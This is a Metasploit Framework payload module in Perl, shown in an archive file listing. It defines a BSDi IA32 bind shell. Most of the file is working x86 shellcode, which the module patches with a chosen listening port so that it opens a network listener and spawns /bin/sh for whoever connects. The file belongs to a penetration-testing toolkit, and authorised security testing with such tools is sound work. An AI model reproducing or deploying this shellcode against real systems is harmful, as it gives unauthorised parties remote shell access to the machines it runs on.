home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / payloads / bsdi_ia32_bind.pm < prev    next >
Text File  |  2006-06-30  |  2KB  |  77 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Payload::bsdi_ia32_bind;
  11.  
  12. use strict;
  13. use base 'Msf::PayloadComponent::BindConnection';
  14.  
  15. my $info =
  16. {
  17.     'Name'         => 'BSDi IA32 Bind Shell',
  18.     'Version'      => '$Revision: 1.2 $',
  19.     'Description'  => 'Listen for connection and spawn a shell',
  20.     'Authors'      => [ 'skape <mmiller [at] hick.org>', 
  21.                         'optyx <optyx [at] uberhax0r.net>' ],
  22.     'Arch'         => [ 'x86' ],
  23.     'Priv'         => 0,
  24.     'OS'           => [ 'bsdi' ],
  25.     'Size'         => '',
  26. };
  27.  
  28. sub new 
  29. {
  30.     my $class = shift;
  31.     my $hash = @_ ? shift : { };
  32.  
  33.     $hash = $class->MergeHashRec($hash, {'Info' => $info});
  34.  
  35.     my $self = $class->SUPER::new($hash, @_);
  36.     
  37.     $self->_Info->{'Size'} = $self->_GenSize;
  38.  
  39.     return $self;
  40. }
  41.  
  42. sub Build 
  43. {
  44.     my $self = shift;
  45.  
  46.     return $self->Generate($self->GetVar('LPORT'));
  47. }
  48.  
  49. sub Generate 
  50. {
  51.     my $self = shift;
  52.     my $port = shift;
  53.     my $port_bin = pack('n', $port);
  54.     my $off_port = 0x1f;
  55.  
  56.     my $shellcode = 
  57.         "\x89\xe5\x68\x00\x07\x00\xc3\xb8\x9a\x00\x00\x00\x99\x50\x89\xe6" .
  58.         "\x31\xc0\x50\x40\x50\x40\x50\xb0\x61\xff\xd6\x52\x68\x10\x02\xbf" .
  59.         "\xbf\x89\xe3\x6a\x10\x53\x50\x6a\x68\x58\xff\xd6\xb0\x6a\xff\xd6" .
  60.         "\x59\x52\x52\x51\xb0\x1e\xff\xd6\x97\x6a\x02\x59\x6a\x5a\x58\x51" .
  61.         "\x57\xff\xd6\x49\x79\xf6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" .
  62.         "\x6e\x89\xe3\x50\x54\x53\xb0\x3b\xff\xd6";
  63.  
  64.     substr($shellcode, $off_port, 2, $port_bin);
  65.   
  66.     return $shellcode;
  67. }
  68.  
  69. sub _GenSize 
  70. {
  71.     my $self = shift;
  72.     
  73.     return length($self->Generate(4444));
  74. }
  75.  
  76. 1;
  77.